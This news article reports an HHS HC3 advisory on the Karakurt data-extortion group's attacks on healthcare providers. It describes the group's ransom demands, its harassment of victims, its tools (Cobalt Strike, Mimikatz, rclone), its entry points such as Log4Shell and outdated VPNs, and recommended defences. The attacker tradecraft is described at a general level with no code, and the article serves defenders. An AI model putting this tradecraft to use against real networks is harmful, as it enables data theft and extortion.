HC3 notes Karakurt ransomware group targeting healthcare entities, reports ‘extensive harassment’ campaigns

The U.S. Department of Health & Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has noted at least four attacks by the Karakurt ransomware group affecting the nation’s healthcare and public health sector since June. 

“The observed attacks have affected an assisted living facility, a dental firm, a healthcare provider, and a hospital,” HC3 said in an analyst note. “According to open source reporting, Karakurt typically conducts scanning, reconnaissance, and collection on its targets for an estimated two-month time span. The threat actor gains access to files containing patient names, addresses, Social Security numbers, dates of birth, medical history information, medical diagnosis information, treatment information, medical record numbers, and health insurance information. The threat actor then threatens to release the information unless a ransom is paid,” it adds.

Earlier this month, healthcare IoT security company Cynerio also disclosed in a report that cyberattacks have increasingly targeted healthcare facilities, with widespread and repeated attacks, financial losses measured in the millions, and frequent failures to take basic cybersecurity measures. Although lagging security practices have fueled the cyberattacks, the failures are measured in fatalities rather than fiscal loss.

The Karakurt ransomware group, also known as the Karakurt Team and Karakurt Lair, is a relatively new cybercrime group, with researchers reporting its initial emergence late last year. The HC3 advisory said that the Karakurt attackers claim to steal data and then threaten to auction it off or release it to the public unless they receive payment of the demanded ransom, which has been known to range from US$25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim. 

“The group likely has ties to the Conti ransomware group, either as a business relationship or as a side business with Conti,” HC3 said. “Karakurt is also known for extensive harassment campaigns against victims to shame them. HC3 recommends the Healthcare and Public Health Sector (HPH) be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise,” it adds.

In June, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury (Treasury), and the Financial Crimes Enforcement Network (FinCEN) issued a joint cybersecurity advisory (CSA) providing information on the Karakurt data extortion group. The hackers have employed various tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. The agencies also provided some recommended actions to mitigate the cyber threats.

The HC3 note observed that once access to a compromised system has been obtained, the Karakurt ransomware group deploys Cobalt Strike beacons to enumerate a network, install Mimikatz to pull plain-text credentials, use AnyDesk to obtain persistent remote control, and utilize additional situation-dependent tools to elevate privileges and move laterally within a network. 

“Karakurt actors then compress (typically with 7zip) and exfiltrate large sums of data—and, in many cases, entire network-connected shared drives in volumes exceeding 1 terabyte (TB)—using open source applications and File Transfer Protocol (FTP) services, such as Filezilla, and cloud storage services including rclone and Mega[dot]nz,” the HC3 noted. “Following the exfiltration of data, Karakurt actors present the victim with ransom notes by way of ‘readme[dot]txt’ files, via emails sent to victim employees over the compromised email networks, and emails sent to victim employees from external email accounts.” 

The ransom notes reveal the victim has been hacked by the ‘Karakurt Team’ and threaten public release or auction of the stolen data, according to HC3. The instructions include a link to a TOR URL with an access code. Visiting the URL and inputting the access code open a chat application over which victims can negotiate with Karakurt actors to have their data deleted. 

Furthermore, Karakurt ransomware victims have reported extensive harassment campaigns by the Karakurt hackers in which employees, business partners, and clients receive numerous emails and phone calls warning the recipients, apart from encouraging them to negotiate with the hackers to prevent the dissemination of victim data. These communications often included samples of stolen data—primarily personally identifiable information (PII), such as employment records, health records, and financial business records. 

Victims who negotiate with the Karakurt ransomware group receive a ‘proof of life’—such as screenshots—showing file trees of allegedly stolen data or, in some cases, actual copies of stolen files. Upon reaching an agreement on the price of the stolen data with the victims, Karakurt actors provided a Bitcoin address—usually a new, previously unused address—to which ransom payments could be made. 

HC3 disclosed that upon receiving the ransom, Karakurt hackers provide some form of alleged proof of deletion of the stolen files, such as a screen recording of the files being deleted, a deletion log, or credentials for a victim to log into a storage server and delete the files themselves.

The Karakurt hackers appear to obtain access to victim devices primarily by purchasing stolen login credentials using cooperating partners in the cybercrime community, who provide Karakurt access to already compromised victims. Another method employed includes buying access to already compromised victims via third-party intrusion broker networks. 

Some of the common intrusion vulnerabilities exploited for initial access in Karakurt events include outdated SonicWall SSL VPN appliances that are vulnerable to multiple recent CVEs, and Log4j ‘Log4Shell’ Apache Logging Services vulnerability. It may also be compromised by phishing and spear phishing, malicious macros within email attachments, and stolen virtual private network (VPN) or remote desktop protocol (RDP) credentials. Furthermore, HC3 identified using outdated Fortinet FortiGate SSL VPN appliances/firewall appliances are vulnerable to multiple recent CVEs, and outdated and/or unserviceable Microsoft Windows Server instances.

The CISA called upon the healthcare sector to implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location. Additionally, operators were called upon to implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization. 

The agency also recommended regular data backup and password protection backup copies offline and ensuring copies of critical data are not accessible for modification or deletion from the system where the data resides. It also suggested installing and regularly updating antivirus software on all hosts and enabling real-time detection, and installing updates/patching operating systems, software, and firmware as soon as updates/patches are released, apart from disabling unused ports.

The healthcare sector must also consider adding an email banner to emails received from outside the organization. In addition, operators must disable hyperlinks in received emails, enforce multi-factor authentication, use National Institute for Standards and Technology (NIST) standards for developing and managing password policies, and require administrator credentials to install the software.

Earlier this month, industrial cybersecurity company Dragos disclosed a drop in industrial ransomware incidents for the year’s second quarter, as ransomware groups continued to target industrial organizations and infrastructures, disrupting OT operations. Based on its analysis for the quarter, Dragos observed that Karakurt has been targeting mainly transportation entities, VICE SOCIETY has been targeting only automotive manufacturing entities, while Lockbit 2.0 is the only group that targeted the pharmaceutical, mining, and water treatment sectors.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.